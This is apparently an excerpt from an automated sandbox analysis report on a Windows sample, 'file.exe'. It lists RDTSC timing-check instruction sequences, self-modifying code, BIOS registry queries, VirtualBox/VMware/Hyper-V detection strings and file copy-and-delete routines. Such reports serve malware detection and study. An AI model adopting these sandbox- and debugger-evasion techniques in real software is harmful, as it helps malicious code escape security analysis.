Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1429A59 second address: 1429A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14304E4 second address: 14304EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14304EE second address: 14304FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431912 second address: 1431918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1431918 second address: 143191C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143191C second address: 1431930 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5656h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14359D2 second address: 14359D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138C53B second address: 138C569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FAF1CCF565Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF5665h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1435C7C second address: 1435C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1435C82 second address: 1435C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1435C87 second address: 1435C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007FAF1CBF1D46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1436296 second address: 14362AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14362AA second address: 14362AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 143640A second address: 1436426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5668h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1436568 second address: 143656C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 144363B second address: 144363F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1441AB3 second address: 1441AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14421C8 second address: 14421EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007FAF1CCF566Ah 0x0000000d jmp 00007FAF1CCF5664h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14421EF second address: 14421F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14421F3 second address: 14421F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1442374 second address: 144238A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D52h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1449AD4 second address: 1449AE3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF1CCF5658h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1455E74 second address: 1455E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D57h 0x00000009 jng 00007FAF1CBF1D46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1459B2B second address: 1459B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FAF1CCF5669h 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1459CB4 second address: 1459CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D57h 0x00000009 jc 00007FAF1CBF1D46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145FFD6 second address: 145FFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 145FFDA second address: 145FFEC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FAF1CBF1D46h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FAF1CBF1D46h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1461640 second address: 146164A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146164A second address: 146165B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FAF1CBF1D46h 0x00000009 jp 00007FAF1CBF1D46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146AFBF second address: 146AFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146AFC3 second address: 146AFD3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF1CBF1D46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146AE2C second address: 146AE30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146AE30 second address: 146AE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146AE38 second address: 146AE47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 146AE47 second address: 146AE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FAF1CBF1D4Eh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007FAF1CBF1D46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1476A45 second address: 1476A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5669h 0x00000009 js 00007FAF1CCF5656h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1475395 second address: 1475399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1475399 second address: 14753B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FAF1CCF5660h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14753B3 second address: 14753EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FAF1CBF1D4Ah 0x0000000b popad 0x0000000c jne 00007FAF1CBF1D53h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FAF1CBF1D4Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF1CBF1D54h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14753EF second address: 14753F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14759A4 second address: 14759B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14759B0 second address: 14759C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5660h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14759C4 second address: 14759D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FAF1CBF1D52h 0x0000000c je 00007FAF1CBF1D46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1475B31 second address: 1475B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1475B35 second address: 1475B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147671B second address: 1476725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1476725 second address: 147672B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 147672B second address: 1476731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1476731 second address: 147673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148C0A7 second address: 148C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAF1CCF5665h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF565Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148C0D3 second address: 148C0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E931 second address: 148E937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E937 second address: 148E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E796 second address: 148E7A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FAF1CCF5656h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E7A3 second address: 148E7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF1CBF1D51h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14AD620 second address: 14AD62A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5672h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14AC536 second address: 14AC53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14AC53B second address: 14AC551 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF1CCF565Ch 0x00000008 jg 00007FAF1CCF5656h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FAF1CCF5656h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14AC551 second address: 14AC557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14ACD35 second address: 14ACD60 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b ja 00007FAF1CCF5656h 0x00000011 jmp 00007FAF1CCF5661h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FAF1CCF5656h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14ACD60 second address: 14ACD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14AD320 second address: 14AD324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B0001 second address: 14B0005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B01D7 second address: 14B01E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B04AA second address: 14B04B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B04B4 second address: 14B04DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jg 00007FAF1CCF5658h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FAF1CCF5658h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B33CC second address: 14B33E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FAF1CBF1D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edi 0x0000000f jnl 00007FAF1CBF1D46h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B4F2D second address: 14B4F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF1CCF5669h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14B4F4B second address: 14B4F55 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E604DC second address: 4E604E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E604E1 second address: 4E604E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E604E8 second address: 4E6050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FAF1CCF5662h 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edx, 6C5DF864h 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cx, dx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6050E second address: 4E6051C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6051C second address: 4E60520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60520 second address: 4E60526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60526 second address: 4E60576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FAF1CCF5667h 0x0000000b or si, BFDEh 0x00000010 jmp 00007FAF1CCF5669h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF1CCF565Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60576 second address: 4E60587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60587 second address: 4E6058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6060A second address: 4E60642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAF1CBF1D53h 0x0000000a adc si, 301Eh 0x0000000f jmp 00007FAF1CBF1D59h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60642 second address: 4E60648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60648 second address: 4E6064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D06FB second address: 13D06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 121D9CF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 121DAB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13C726D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13C5B39 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13C5760 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13EB617 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 121D97E instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,		0_2_00F440F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,		0_2_00F3E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,		0_2_00F447C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F3F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F31710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,		0_2_00F3DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F44B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,		0_2_00F43B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,		0_2_00F3BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,		0_2_00F3EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,		0_2_00F3DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F31160 GetSystemInfo,ExitProcess,

0_2_00F31160

Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2113114519.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareV9
